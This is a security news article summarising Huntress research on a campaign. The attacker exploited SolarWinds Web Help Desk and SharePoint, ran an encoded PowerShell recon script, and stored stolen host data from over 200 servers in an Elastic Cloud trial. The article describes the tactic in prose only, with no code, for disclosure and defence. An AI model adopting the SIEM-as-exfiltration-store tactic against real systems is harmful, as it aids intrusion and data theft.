Threat Actor Exploits Enterprise Flaws, Uses Elastic Cloud SIEM as Data Repository for Stolen System Info
Huntress researchers uncovered a campaign where a threat actor exploited vulnerabilities in SolarWinds Web Help Desk and other enterprise software, then used a free trial of Elastic Cloud SIEM to store and triage stolen system data from over 200 hosts.
A sophisticated campaign uncovered by Huntress researchers reveals a threat actor exploiting multiple enterprise software vulnerabilities to compromise over 200 hosts across 34 Active Directory domains, then using a free trial of Elastic Cloud's security information and event management (SIEM) platform as a data repository for stolen system information.
The attacker exploited flaws in widely used enterprise tools including SolarWinds Web Help Desk and Microsoft SharePoint, deploying an encoded PowerShell command on compromised systems. The script collected detailed host information such as operating system details, hardware specifications, Active Directory data, and installed patch levels, transmitting it to an ElasticSearch index named 'systeminfo' within the attacker-controlled Elastic Cloud instance.
Instead of traditional command-and-control (C2) infrastructure, the attacker turned a legitimate security monitoring tool into a repository for stolen data. The Elastic Cloud deployment was created on January 28, 2026, and remained active for several days. Telemetry showed the operator repeatedly interacting with the environment through the Kibana interface, logging hundreds of actions while examining incoming victim data.
Further analysis revealed that the trial account was registered using a disposable email address linked to the domain quieresmail.com, tied to the Russian-registered temporary email network firstmail.ltd, which operates hundreds of throwaway domains. Administrative logins to the SIEM instance were traced to IP addresses believed to originate from a SAFING VPN privacy network tunnel.
The campaign affected at least 216 hosts, with the majority being servers running Windows Server 2019 or 2022. Victims spanned government organizations, universities, universities, financial services, manufacturing and automotive firms, IT service providers, and retailers. Some hostnames suggested the attacker was also exploiting vulnerabilities in Microsoft SharePoint.
Researchers coordinated with Elastic and law enforcement to notify affected organizations and investigate the infrastructure. The cloud instance used in the campaign has since been taken offline. Huntress performed outreach and victim notification to organizations identified within the uncovered data.
This incident highlights a novel tactic where attackers repurpose legitimate security tools for malicious data aggregation, turning defensive monitoring platforms into offensive reconnaissance hubs. The use of disposable email domains and VPN tunnels underscores the attacker's operational security measures, while the broad sector targeting suggests a general espionage or reconnaissance campaign rather than a targeted attack.